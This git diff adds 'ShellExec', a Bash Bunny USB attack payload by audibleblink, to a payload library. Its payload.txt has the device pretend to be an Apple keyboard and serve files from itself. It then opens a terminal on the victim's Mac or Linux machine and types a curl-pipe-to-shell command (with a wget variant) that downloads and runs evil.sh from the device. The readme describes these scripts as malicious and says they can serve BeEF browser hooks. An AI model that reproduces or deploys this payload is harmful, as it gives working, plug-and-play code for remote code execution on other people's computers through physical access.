diff --git a/payloads/library/ShellExec/evil.sh b/payloads/library/ShellExec/evil.sh new file mode 100644 index 00000000..5b355e78 --- /dev/null +++ b/payloads/library/ShellExec/evil.sh @@ -0,0 +1,6 @@ +!#/bin/bash + +# opens browsers to the bunny's index.html page + +[[ "$(uname)" == "Darwin" ]] && open http://172.16.64.1 +[[ "$(uname)" == "Linux" ]] && xdg-open http://172.16.64.1 diff --git a/payloads/library/ShellExec/hook.js b/payloads/library/ShellExec/hook.js new file mode 100644 index 00000000..8454efc5 --- /dev/null +++ b/payloads/library/ShellExec/hook.js @@ -0,0 +1 @@ +alert('This is where your evil JavaScript file would go') diff --git a/payloads/library/ShellExec/index.html b/payloads/library/ShellExec/index.html new file mode 100644 index 00000000..c026f1ea --- /dev/null +++ b/payloads/library/ShellExec/index.html @@ -0,0 +1,12 @@ + + + + + + +Nothing to see here! + + + + + diff --git a/payloads/library/ShellExec/payload.txt b/payloads/library/ShellExec/payload.txt new file mode 100644 index 00000000..970f723f --- /dev/null +++ b/payloads/library/ShellExec/payload.txt @@ -0,0 +1,49 @@ +#!/bin/bash + +# Title: ShellExec +# Author: audibleblink +# Target: Mac/Linux +# Version: 1.0 +# +# Create a web server on the BashBunny and forces +# the victim download and execute a script. +# +# White | Ready +# Ammber blinking | Waiting for server +# Blue blinking | Attacking +# Green | Finished + +LED R G B +ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E + +source bunny_helpers.sh + +# switch to payload directory +cd /root/udisk/payloads/$SWITCH_POSITION + +# starting server +LED R G 500 +python -c "import SimpleHTTPServer; import BaseHTTPServer; h=BaseHTTPServer.HTTPServer(('$HOST_IP', 80),SimpleHTTPServer.SimpleHTTPRequestHandler); h.serve_forever();" &> server.log & + +# wait until port is listening +while ! nc -z $HOST_IP 80; do sleep 0.2; done + +# attack commences +LED B 500 + +Q GUI SPACE +Q DELAY 300 +Q STRING terminal +Q DELAY 100 +Q ENTER +Q DELAY 2000 + +# Q ALT F2 # swap with block above for linux +# Q DELAY 100 + +Q STRING curl "http://$HOST_IP/evil.sh" \| sh +# in case curl isn't installed +# Q STRING wget -O - "http://$HOST_IP/evil.sh" \| sh +Q ENTER + +LED G diff --git a/payloads/library/ShellExec/readme.md b/payloads/library/ShellExec/readme.md new file mode 100644 index 00000000..3caa2bf8 --- /dev/null +++ b/payloads/library/ShellExec/readme.md @@ -0,0 +1,34 @@ +# ShellExec + +Author: audibleblink +Version: 1.0 + +## Description + +Serves malicious scripts or web pages from the Bunny and forces +victims to curl and execute those scripts. Scripts can also force +browsers to open a url on the bunny to do things like serve BeEF +hooks. + +## Configuration + +evil.py - script that is fetched with DuckyScript +(provided script opens a web page that serves a BeEF hook ) + +hook.js - the aforementioned BeEF hook + +index.html - BeEF hook delivery page + +## Requirements + +Just plug and play + +## Status + +| LED | Status | +| --------- | ----------- | +| White | Ready | +| Amber blinking | Waiting for server | +| Blue blinking | Attacking | +| Green | Finished | +